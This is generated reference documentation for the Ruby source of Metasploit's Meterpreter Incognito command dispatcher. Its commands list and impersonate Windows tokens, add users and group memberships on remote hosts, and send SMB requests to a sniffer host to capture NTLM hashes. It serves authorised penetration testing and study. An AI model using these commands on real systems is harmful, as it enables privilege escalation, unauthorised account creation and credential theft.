Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito
Overview
Privilege escalation extension user interface.
Constant Summary
collapse
- Klass =
Console::CommandDispatcher::Incognito
- @@add_user_opts =
Rex::Parser::Arguments.new(
"-h" => [ true, "Add user to remote host" ])
- @@add_localgroup_user_opts =
Rex::Parser::Arguments.new(
"-h" => [ true, "Add user to local group on remote host" ])
- @@add_group_user_opts =
Rex::Parser::Arguments.new(
"-h" => [ true, "Add user to global group on remote host" ])
- @@list_tokens_opts =
Rex::Parser::Arguments.new(
"-u" => [ false, "List tokens by unique username" ],
"-g" => [ false, "List tokens by unique groupname" ])
Instance Attribute Summary
#shell, #tab_complete_items
Instance Method Summary
collapse
check_hash, #client, #log_error, #msf_loaded?, set_hash
#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #help_to_s, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_filenames, #update_prompt
Constructor Details
#initialize(shell) ⇒ Incognito
Initializes an instance of the priv command interaction.
23
24
25
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 23
def initialize(shell)
super
end
|
Instance Method Details
#cmd_add_group_user(*args) ⇒ Object
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 177
def cmd_add_group_user(*args)
host = "127.0.0.1"
@@add_group_user_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
host = val
end
}
if (args.length < 2)
print_line("Usage: add_group_user <groupname> <username> [options]\n")
print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
print_line(@@add_group_user_opts.usage)
return
end
system_privilege_check
groupname = args[0]
username = args[1]
client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
print(string)
}
return true
end
|
#cmd_add_localgroup_user(*args) ⇒ Object
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 147
def cmd_add_localgroup_user(*args)
host = "127.0.0.1"
@@add_localgroup_user_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
host = val
end
}
if (args.length < 2)
print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
print_line(@@add_localgroup_user_opts.usage)
return
end
system_privilege_check
groupname = args[0]
username = args[1]
client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
print(string)
}
return true
end
|
#cmd_add_user(*args) ⇒ Object
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 117
def cmd_add_user(*args)
host = "127.0.0.1"
@@add_user_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
host = val
end
}
if (args.length < 2)
print_line("Usage: add_user <username> <password> [options]\n")
print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
print_line(@@add_user_opts.usage)
return
end
system_privilege_check
username = args[0]
password = args[1]
client.incognito.incognito_add_user(host, username, password).each_line { |string|
print(string)
}
return true
end
|
#cmd_impersonate_token(*args) ⇒ Object
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 99
def cmd_impersonate_token(*args)
if (args.length < 1)
print_line("Usage: impersonate_token <token>\n")
print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
print_line("Hint: Enclose with quotation marks if name contains a space\n")
return
end
system_privilege_check
username = args[0]
client.incognito.incognito_impersonate_token(username).each_line { |string|
print(string)
}
return true
end
|
#cmd_list_tokens(*args) ⇒ Object
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 55
def cmd_list_tokens(*args)
token_order = -1
@@list_tokens_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
token_order = 0
when "-g"
token_order = 1
end
}
if (token_order == -1)
print_line("Usage: list_tokens <list_order_option>\n")
print_line("Lists all accessible tokens and their privilege level")
print_line(@@list_tokens_opts.usage)
return
end
system_privilege_check
tokens = client.incognito.incognito_list_tokens(token_order)
print_line()
print_line("Delegation Tokens Available")
print_line("========================================")
tokens['delegation'].each_line { |string|
print(string)
}
print_line()
print_line("Impersonation Tokens Available")
print_line("========================================")
tokens['impersonation'].each_line { |string|
print(string)
}
print_line()
return true
end
|
#cmd_snarf_hashes(*args) ⇒ Object
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 207
def cmd_snarf_hashes(*args)
if (args.length < 1)
print_line("Usage: snarf_hashes <sniffer_host>\n")
print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
return
end
system_privilege_check
print_line("[*] Snarfing token hashes...")
client.incognito.incognito_snarf_hashes(args[0])
print_line("[*] Done. Check sniffer logs")
return true
end
|
#commands ⇒ Object
List of supported commands.
30
31
32
33
34
35
36
37
38
39
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 30
def commands
{
"add_user" => "Attempt to add a user with all tokens",
"add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
"add_group_user" => "Attempt to add a user to a global group with all tokens",
"list_tokens" => "List tokens available under current user context",
"impersonate_token" => "Impersonate specified token",
"snarf_hashes" => "Snarf challenge/response hashes for every token"
}
end
|
#name ⇒ Object
233
234
235
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 233
def name
"Incognito"
end
|
#system_privilege_check ⇒ Object
223
224
225
226
227
228
|
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 223
def system_privilege_check
if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
print_line(" Call rev2self if primary process token is SYSTEM")
end
end
|